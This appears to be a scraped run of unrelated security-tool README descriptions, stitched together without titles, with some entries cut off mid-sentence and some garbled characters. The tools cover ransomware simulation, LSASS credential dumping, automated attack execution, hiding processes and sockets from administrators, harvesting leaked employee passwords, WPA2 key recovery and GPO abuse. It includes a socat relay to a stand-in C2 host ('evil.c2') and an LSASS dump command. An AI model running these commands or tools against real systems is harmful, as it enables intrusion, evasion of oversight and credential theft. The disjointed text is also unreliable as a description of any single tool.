RansomwareSim is a simulated ransomware application developed for educational and training purposes. It is designed to demonstrate how ransomware encrypts files on a system and communicates with a command-and-control server. This tool is strictly for educational use and should not be used for malicious purposes.
Features
Encrypts specified file types within a target directory.
Changes the desktop wallpaper (Windows only).
Creates&Delete a README file on the desktop with a simulated ransom note.
Simulates communication with a command-and-control server to send system data and receive a decryption key.
Decrypts files after receiving the correct key.
Usage
Important: This tool should only be used in controlled environments where all participants have given consent. Do not use this tool on any system without explicit permission. For more, read SECURE
Run decoder.py after the files have been encrypted.
Follow the prompts to input the decryption key.
Disclaimer
RansomwareSim is developed for educational purposes only. The creators of RansomwareSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.
Contributing
Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.
Fork the repository.
Create a new branch for your feature or bug fix.
Make your changes and commit them.
Push your changes to your forked repository.
Open a pull request in the main repository.
Contact
For any inquiries or further information, you can reach me through the following channels:
PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.
Features:
Utilizes a list of proxy IP addresses from a specified file.
Supports both HTTP and HTTPS proxies.
Allows users to input the target website URL, proxy file path, and a static port.
Makes HTTP requests to the specified website using each proxy.
Parses HTML content to extract and visit links on the webpage.
Usage:
POC Testing: Simulate website interactions to assess functionality under different proxy setups.
Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.
Get New Proxies with port and add in proxies.txt in this format 50.168.163.176:80
You can add it from here: https://free-proxy-list.net/ these free proxies are not validated some might not work so first validate these proxies before adding.
Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.
Snapshots:
If you find this GitHub repo useful, please consider giving it a star!
Valid8Proxy is a versatile and user-friendly tool designed for fetching, validating, and storing working proxies. Whether you need proxies for web scraping, data anonymization, or testing network security, Valid8Proxy simplifies the process by providing a seamless way to obtain reliable and verified proxies.
Features:
Proxy Fetching: Retrieve proxies from popular proxy sources with a single command.
Proxy Validation: Efficiently validate proxies using multithreading to save time.
Save to File: Save the list of validated proxies to a file for future use.
Sit back and let Valid8Proxy fetch, validate, and display working proxies.
Save to File:
At the end of the process, Valid8Proxy will save the list of working proxies to a file named "proxies.txt" in the same directory.
Check Results:
Review the working proxies in the terminal with color-coded output.
Find the list of working proxies saved in "proxies.txt."
If you already have proxies just want to validate usee this:
python Validator.py
Follow the prompts:
Enter the path to the file containing proxies (e.g., proxy_list.txt). Enter the number of proxies you want to validate. The script will then validate the specified number of proxies using multiple threads and print the valid proxies.
Contribution:
Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request.
Snapshots:
If you find this GitHub repo useful, please consider giving it a star!
Note that PROCEXP15.SYS is listed in the source files for compiling purposes. It does not need to be transferred on the target machine alongside the PPLBlade.exe.
It’s already embedded into the PPLBlade.exe. The exploit is just a single executable.
Modes:
Dump - Dump process memory using PID or Process Name
Decrypt - Revert obfuscated(--obfuscate) dump file to its original state
Cleanup - Do cleanup manually, in case something goes wrong on execution (Note that the option values should be the same as for the execution, we're trying to clean up)
DoThatLsassThing - Dump lsass.exe using Process Explorerdriver(basic poc)
Handle Modes:
Direct - Opens PROCESS_ALL_ACCESS handle directly, using OpenProcess() function
Procexp - Uses PROCEXP152.sys to obtain a handle
Examples:
Basic POC that uses PROCEXP152.sys to dump lsass:
PPLBlade.exe --mode dothatlsassthing
(Note that it does not XOR dump file, provide an additional obfuscate flag to enable the XOR functionality)
Upload the obfuscated LSASS dump onto a remote location:
CATSploit is an automated penetration testing tool using Cyber Attack Techniques Scoring (CATS) method that can be used without pentester. Currently, pentesters implicitly made the selection of suitable attack techniques for target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, software version collected by scanner and calculates a score value for capture eVc and detectability eVd of each attack techniques for target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack(professional pentester’s skill) .
CATSploit automatically performs penetration tests in the following sequence:
Information gathering and prior information input First, gathering information of target systems. CATSploit supports nmap and OpenVAS to gather information of target systems. CATSploit also supports prior information of target systems if you have.
Calculating score value of attack techniques Using information obtained in the previous phase and attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack techniques are calculated. For each target computer, the values of each attack technique are calculated.
Selection of attack techniques by using scores and make attack scenario Select attack techniques and create attack scenarios according to pre-defined policies. For example, for a policy that prioritized hard-to-detect, the attack techniques with the lowest eVd(Detectable Score) will be selected.
Execution of attack scenario CATSploit executes the attack techniques according to attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and Metasploit API to execute actual attacks.
Prerequisities
CATSploit has the following prerequisites:
Kali Linux 2023.2a
Installation
For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.
Installing CATSploit
To install the latest version of CATSploit, please use the following commands:
CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json, the following fields should be modified for your environment.
DBMS
dbname: database name created for CATSploit
user: username of PostgreSQL
password: password of PostgrSQL
host: If you are using a database on a remote host, specify the IP address of the host
SCENARIO
generator.maxscenarios: Maximum number of scenarios to calculate (*)
ATTACKPF
msfpassword: password of MSFRPCD
openvas.user: username of PostgreSQL
openvas.password: password of PostgreSQL
openvas.maxhosts: Maximum number of hosts to be test at the same time (*)
openvas.maxchecks: Maximum number of test items to be test at the same time (*)
ATTACKDB
attack_db_dir: Path to the folder where AtackSteps are stored
(*) Adjust the number according to the specs of your machine.
Usage
To start the server, execute the following command:
$ python cats_server.py -c [CONFIG_FILE]
Next, prepare another console, start the client program, and initiate a connection to the server.
$ python catsploit.py -s [SOCKET_PATH]
After successfully connecting to the server and initializing it, the session will start.
options: -h, --help show this help message and exit
I've posted the commands and options below as well for reference.
host list: show information about the hosts usage: host list [-h] options: -h, --help show this help message and exit
host detail: show more information about one host usage: host detail [-h] host_id positional arguments: host_id ID of the host for which you want to show information options: -h, --help show this help message and exit
scenario list: show information about the scenarios usage: scenario list [-h] options: -h, --help show this help message and exit
scenario detail: show more information about one scenario usage: scenario detail [-h] scenario_id positional arguments: scenario_id ID of the scenario for which you want to show information options: -h, --help show this help message and exit
scan: run network-scan and security-scan usage: scan [-h] [--port PORT] targe t_host [target_host ...] positional arguments: target_host IP address to be scanned options: -h, --help show this help message and exit --port PORT ports to be scanned
plan: planning attack scenarios usage: plan [-h] src_host_id dst_host_id positional arguments: src_host_id originating host dst_host_id target host options: -h, --help show this help message and exit
attack: execute attack scenario usage: attack [-h] scenario_id positional arguments: scenario_id ID of the scenario you want to execute
options: -h, --help show this help message and exit
post find-secret: find confidential information files that can be performed on the pwned host usage: post find-secret [-h] host_id positional arguments: host_id ID of the host for which you want to find confidential information op tions: -h, --help show this help message and exit
reset: reset data on the server usage: reset [-h] {system} ... positional arguments: {system} reset system options: -h, --help show this help message and exit
exit: exit CATSploit usage: exit [-h] options: -h, --help show this help message and exit
Examples
In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.
catsploit> scan 192.168.0.0/24 Network Scanning ... 100% [*] Total 2 hosts were discovered. Vulnerability Scanning ... 100% [*] Total 14 vulnerabilities were discovered. catsploit> host list ┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓ ┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃ ┡━━━━━━ ━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩ │ attacker │ 0.0.0.0 │ kali │ kali 2022.4 │ True │ │ h_exbiy6 │ 192.168.0.10 │ │ Linux 3.10 - 4.11 │ False │ │ h_nhqyfq │ 192.168.0.20 │ │ Microsoft Windows 7 SP1 │ False │ └──────────┴ ───────────────┴──────────┴──────────────────────────────────┴───────┘
With the raise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: Would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of System Administrators, not only by hiding eBPF, but much more:
bpftool
bpflist-bpfcc
ps
top
sockstat
ss
rkhunter
chkrootkit
lsof
auditd
etc...
All these tools go blind to what goes through nysm. It hides:
New eBPF programs
New eBPF maps ️
New eBPF links
New Auditd generated logs
New PIDs 着
New sockets
Warning This tool is a simple demonstration of eBPF capabilities as such. It is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.
-d, --detach Run COMMAND in background -r, --rm Self destruct after execution -v, --verbose Produce verbose output -h, --help Display this help --usage Display a short usage message
Examples
Run a hidden bash:
./nysm bash
Run a hidden ssh and remove ./nysm:
./nysm -r ssh user@domain
Run a hidden socat as a daemon and remove ./nysm:
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443
How it works
In general
As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest level call interacting with a userspace address to overwrite its value and hide the desired objects.
To differentiate nysm events from the others, everything runs inside a seperated PID namespace.
Hide eBPF objects
bpftool has some features nysm wants to evade: bpftool prog list, bpftool map list and bpftool link list.
As any eBPF program, bpftool uses the bpf() system call, and more specifically with the BPF_PROG_GET_NEXT_ID, BPF_MAP_GET_NEXT_ID and BPF_LINK_GET_NEXT_ID commands. The result of these calls is stored in the userspace address pointed by the attr argument.
To overwrite uattr, a tracepoint is set on the bpf() entry to store the pointed address in a map. Once done, it waits for the bpf() exit tracepoint. When bpf() exists, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID, bpf_attr.start_id is replaced by bpf_attr.next_id.
In order to hide specific IDs, it checks bpf_attr.next_id and replaces it with the next ID that was not created in nysm.
Auditd receives its logs from recvfrom() which stores its messages in a buffer.
If the message received was generated by a nysm process through audit_log_end(), it replaces the message length in its nlmsghdr header by 0.
Hide PIDS
Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid() PIDs from getdents64() in /proc by changing the length of the previous record.
As getdents64() requires to loop through all its files, the eBPF instructions limit is easily reached. Therefore, nysm uses tail calls before reaching it.
Hide sockets
Hiding sockets is a big word. In fact, opened sockets are already hidden from many tools as they cannot find the process in /proc. Nevertheless, ss uses socket() with the NETLINK_SOCK_DIAG flag which returns all the currently opened sockets. After that, ss receives the result through recvmsg() in a message buffer and the returned value is the length of all these messages combined.
Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.
These are collected from the connect() and bind() calls.
Limitations
Even with the best effort, nysm still has some limitations.
Every tool that does not close their file descriptors will spot nysm processes created while they are open. For example, if ./nysm bash is running before top, the processes will not show up. But, if another process is created from that bash instance while top is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.
Kernel logs: dmesg and /var/log/kern.log, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory! will pop several times because of the eBPF verifier on nysm run.
Many traces written into files are left as hooking read() and write() would be too heavy (but still possible). For example /proc/net/tcp or /sys/kernel/debug/tracing/enabled_functions.
Hiding ssrecvmsg can be challenging as a new socket can pop at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to switch place between the first one and the next legitimate socket, but what if a socket is in the buffer by itself? Therefore, nysm modifies the first socket information with hardcoded values.
Running bpf() with any kind of BPF_*_GET_NEXT_ID flag from a nysm child process should be avoided as it would hide every non-nysm eBPF objects.
Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.
WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.
The script first enumerate all the subdomains of the given target domain using assetfinder, sublister, subfinder, amass, findomain, hackertarget, riddler and crt then do active subdomain enumeration using gobuster from SecLists wordlist then filters out all the live subdomains using dnsx then it extract titles of the subdomains using httpx & scans for subdomain takeover using subjack. Then it uses gauplus & waybackurls to crawl all the endpoints of the given subdomains then it use gf patterns to filters out xss, lfi, ssrf, sqli, open redirect & rce parameters from that given subdomains, and then it scans for vulnerabilities on the sub domains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Then it'll print out the result of the scan and save all the output in a specified directory.
Extract titles and take screenshots of live subdoamins using aquatone & httpx.
Crawl all the endpoints of the subdomains using waybackurls & gauplus and filter out XSS, SQLi, SSRF, etc parameters using gf patterns.
Run different open-source tools (like dalfox, nuclei, sqlmap, etc) to search for vulnerabilities on these parameters and then save all the outputs in the folder.
Flags: -d Add your target [Requried] -o To save outputs in folder [Default: domain.com] -t Number of threads [Default: 100] -b Add your server for BXSS [Default: False] -x Exclude out of scope domains [Default: False] -s Run only Subdomain Enumeration [Default: False] -h Show this help message
Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server
Installing WebCopilot
WebCopilot requires git to install successfully. Run the following command as a root to install webcopilot
[❌] Warning: Use with caution. You are responsible for your own actions. [❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.
[●] Active Subdoamin Scanning is in progress: [!] Please be patient. This may take a while... [●] Active Subdoamin Scanned - [gobuster✔] Subdomain Found: 11 [●] Active Subdoamin Scanned - [amass✔] Subdomain Found: 0
[●] Subdomain Scanning: Filtering out of scope subdomains [●] Subdomain Scanning: Filtering Alive subdomains [●] Subdomain Scanning: Getting titles of valid subdomains [●] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/
[●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30
Warning: Developers assume no liability and are not responsible for any misuse or damage cause by this tool. So, please se with caution because you are responsible for your own actions.
Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.
Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.
What does Bugsy do?
Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).
Scan
Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo
Analyzes the vulnerability report to identify issues that can be remediated automatically
Produces the code fixes and redirects the user to the fix report page on the Mobb platform
Analyze
Analyzes the a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically
Produces the code fixes and redirects the user to the fix report page on the Mobb platform
Disclaimer
This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.
Usage
You can simply run Bugsy from the command line, using npx:
This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.
How it Works
The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You an easily add yours and connect to through the tool.
Installation
To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:
cd cli pip install -r requirements.txt
OSX
We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it running:
cd cli python3 -m pip install psycopg2-binary`
Basic Usage
To use the tool, simply run the following command:
python3 cli/emploleaks.py
If everything went well during the installation, you will be able to start using EmploLeaks:
OSINT tool 🕵 to chain multiple apis emploleaks>
Right now, the tool supports two functionalities:
Linkedin, for searching all employees from a company and get their personal emails.
A GitLab extension, which is capable of finding personal code repositories from the employees.
If defined and connected, when the tool is gathering employees profiles, a search to a COMB database will be made in order to retrieve leaked passwords.
Retrieving Linkedin Profiles
First, you must set the plugin to use, which in this case is linkedin. After, you should set your authentication tokens and the run the impersonate process:
emploleaks> use --plugin linkedin emploleaks(linkedin)> setopt JSESSIONID JSESSIONID: [+] Updating value successfull emploleaks(linkedin)> setopt li-at li-at: [+] Updating value successfull emploleaks(linkedin)> show options Module options:
Name Current Setting Required Description ---------- ----------------------------------- ---------- ----------------------------------- hide yes no hide the JSESSIONID field JSESSIONID ************************** no active cookie session in browser #1 li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1 YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET kyCyfN58SNNH emploleaks(linkedin)> run i mpersonate [+] Using cookies from the browser Setting for first time JSESSIONID Setting for first time li_at
li_at and JSESSIONID are the authentication cookies of your LinkedIn session on the browser. You can use the Web Developer Tools to get it, just sign-in normally at LinkedIn and press right click and Inspect, those cookies will be in the Storage tab.
Now that the module is configured, you can run it and start gathering information from the company:
Get Linkedin accounts + Leaked Passwords
We created a custom workflow, where with the information retrieved by Linkedin, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the connect command, as it is shown below:
emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4 [+] Connecting to the Leak Database... [*] version: PostgreSQL 12.15
Once it's connected, you can run the workflow. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:
As a conclusion, the tool will generate a console output with the following information:
A list of employees of the company (obtained from LinkedIn)
The social network profiles associated with each employee (obtained from email address)
A list of leaked passwords associated with each email address.
How to build the indexed COMB database
An imortant aspect of this project is the use of the indexed COMB database, to build your version you need to download the torrent first. Be careful, because the files and the indexed version downloaded requires, at least, 400 GB of disk space available.
Once the torrent has been completelly downloaded you will get a file folder as following:
├── count_total.sh ├── data │ ├── 0 │ ├── 1 │ │ ├── 0 │ │ ├── 1 │ │ ├── 2 │ │ ├── 3 │ │ ├── 4 │ │ ├─â&€ 5 │ │ ├── 6 │ │ ├── 7 │ │ ├── 8 │ │ ├── 9 │ │ ├── a │ │ ├── b │ │ ├── c │ │ ├── d │ │ ├── e │ │ ├── f │ │ ├── g │ │ ├── h │ │ ├── i │ │ ├── j │ │ ├── k │ │ ├── l │ │ ├── m │ │ ├⠀─ n │ │ ├── o │ │ ├── p │ │ ├── q │ │ ├── r │ │ ├── s │ │ ├── symbols │ │ ├── t
At this point, you could import all those files with the command create_db:
The importer takes a lot of time for that reason we recommend to run it with patience.
Next Steps
We are integrating other public sites and applications that may offer about a leaked credential. We may not be able to see the plaintext password, but it will give an insight if the user has any compromised credential:
Integration with Have I Been Pwned?
Integration with Firefox Monitor
Integration with Leak Check
Integration with BreachAlarm
Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:
Login panel Detector Module -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email') -t , --threads Number of threads (default 30) -h, --help Show this help message and exit " dir="auto">
optional arguments: -u , --url Target URL (e.g. http://example.com/ ) -f , --file Select a target hosts list file (e.g. list.txt ) --proxy Proxy (e.g. http://127.0.0.1:8080) -l, --login run only Login panel Detector Module -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email') -t , --threads Number of threads (default 30) -h, --help Show this help message and exit
Screenshots
Development
TODO
adding "POST form SQli (Time based) scanning" and check for delay
Fuzzing on Url Paths So as not to miss any login panel
Easy EASM is just that... the easiest to set-up tool to give your organization visibility into its external facing assets.
The industry is dominated by $30k vendors selling "Attack Surface Management," but OG bug bounty hunters and red teamers know the truth. External ASM was born out of the bug bounty scene. Most of these $30k vendors use this open-source tooling on the backend.
With ten lines of setup or less, using open-source tools, and one button deployment, Easy EASM will give your organization a complete view of your online assets. Easy EASM scans you daily and alerts you via Slack or Discord on newly found assets! Easy EASM also spits out an Excel skeleton for a Risk Register or Asset Database! This isn't rocket science, but it's USEFUL. Don't get scammed. Grab Easy EASM and feel confident you know what's facing attackers on the internet.
Installation
go install github.com/g0ldencybersec/EasyEASM/easyeasm@latest
Example config file
The tool expects a configuration file named config.yml to be in the directory you are running from.
Here is example of this yaml file:
# EasyEASM configurations runConfig: domains: # List root domains here. - example.com - mydomain.com slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications. discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications. runType: fast # Set to either fast (passive enum) or complete (active enumeration). activeWordList: subdomainWordlist.txt activeThreads: 100
Usage
To run the tool, fill out the config file: config.yml. Then, run the easyeasm module:
./easyeasm
After the run is complete, you should see the output CSV (EasyEASM.csv) in the run directory. This CSV can be added to your asset database and risk register!
Warranty
The creator(s) of this tool provides no warranty or assurance regarding its performance, dependability, or suitability for any specific purpose.
The tool is furnished on an "as is" basis without any form of warranty, whether express or implied, encompassing, but not limited to, implied warranties of merchantability, fitness for a particular purpose, or non-infringement.
The user assumes full responsibility for employing this tool and does so at their own peril. The creator(s) holds no accountability for any loss, damage, or expenses sustained by the user or any third party due to the utilization of this tool, whether in a direct or indirect manner.
Moreover, the creator(s) explicitly renounces any liability or responsibility for the accuracy, substance, or availability of information acquired through the use of this tool, as well as for any harm inflicted by viruses, malware, or other malicious components that may infiltrate the user's system as a result of employing this tool.
By utilizing this tool, the user acknowledges that they have perused and understood this warranty declaration and agree to undertake all risks linked to its utilization.
License
This project is licensed under the MIT License - see the LICENSE.md for details.
Contact
For assistance, use the Issues tab. If we do not respond within 7 days, please reach out to us here.
This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.
This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.
Obtaining the PMKID
Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.
*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.
To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.
Open the pcap in WireShark:
Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below
If access point is vulnerable, you should see the PMKID value like the below screenshot:
Demo Run
Disclaimer
This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.
Finding assets from certificates! Scan the web! Tool presented @DEFCON 31
Install
** You must have CGO enabled, and may have to install gcc to run CloudRecon**
sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest
Description
CloudRecon
CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.
Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all but many still need HTTPs.
CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.
The tool suite is three parts in GO:
Scrape - A LIVE running tool to inspect the ranges for a keywork in SSL certs CN and SN fields in real time.
Store - a tool to retrieve IPs certs and download all their Orgs, CNs, and SANs. So you can have your OWN cert.sh database.
Retr - a tool to parse and search through the downloaded certs for keywords.
Usage
MAIN
Usage: CloudRecon scrape|store|retr [options]
-h Show the program usage message
Subcommands:
cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file cloudrecon retr - Query local DB file for results
SCRAPE
scrape [options] -i <IPs/CIDRs or File> -a Add this flag if you want to see all output including failures -c int How many goroutines running concurrently (default 100) -h print usage! -i string Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" ) -p string TLS ports to check for certificates (default "443") -t int Timeout for TLS handshake (default 4)
STORE
store [options] -i <IPs/CIDRs or File> -c int How many goroutines running concurrently (default 100) -db string String of the DB you want to connect to and save certs! (default "certificates.db") -h print usage! -i string Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE") -p string TLS ports to check for certificates (default "443") -t int Timeout for TLS handshake (default 4)
RETR
retr [options] -all Return all the rows in the DB -cn string String to search for in common name column, returns like-results (default "NONE") -db string String of the DB you want to connect to and save certs! (default "certificates.db") -h print usage! -ip string String to search for in IP column, returns like-results (default "NONE") -num Return the Number of rows (results) in the DB (By IP) -org string String to search for in Organization column, returns like-results (default "NONE") -san string String to search for in common name column, returns like-results (default "NONE")
This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.
Default behavior adds a local administrator.
How to use
Basic usage
Add john user to local administrators group (Password: H4x00r123..)
FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.
One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.
One of the hardest releationships to gather for BloodHound is the local group memberships and the session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.
This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.
Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.
Other examples where FalconHound can be used:
Adding, removing or timing out sessions in the graph, based on logon and logoff events.
Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
Adding CVE information and whether there is a public exploit available to the graph.
All kinds of Azure activities.
Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
Adding new users, groups and computers to the graph.
Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.
The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.
A blog detailing more on why we developed it and some use case examples can be found here
FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.
Currently, FalconHound supports the following data sources and or targets:
Azure Sentinel
Azure Sentinel Watchlists
Splunk
Microsoft Defender for Endpoint
Neo4j
MS Graph API (early stage)
CSV files
Additional data sources and targets are planned for the future.
At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.
Installation
Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the releases section.
Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to creat all crededentials can be found here.
The recommened way to run FalconHound is to run it as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.
Requirements
BloodHound, or at least the Neo4j database for now.
A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
Credentials for each endpoint you want to talk to, with the required permissions.
Configuration
FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.
Usage
Default run
To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.
./falconhound -go
List all enabled actions
To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.
./falconhound -actionlist -go
Run with a select set of actions
To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.
./falconhound -ids action1,action2,action3 -go
Run with a different config file
By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.
./falconhound -go -config /path/to/config.yml
Run with a different actions folder
By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.
By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.
./falconhound -go -keyvault
Actions
Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.
Action folder structure
The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.
The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.
Action files
All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.
There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.
While most items will be fairly self explanatory,there are some important things to note about actions:
Enabled
As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.
Enabled: true
Debug
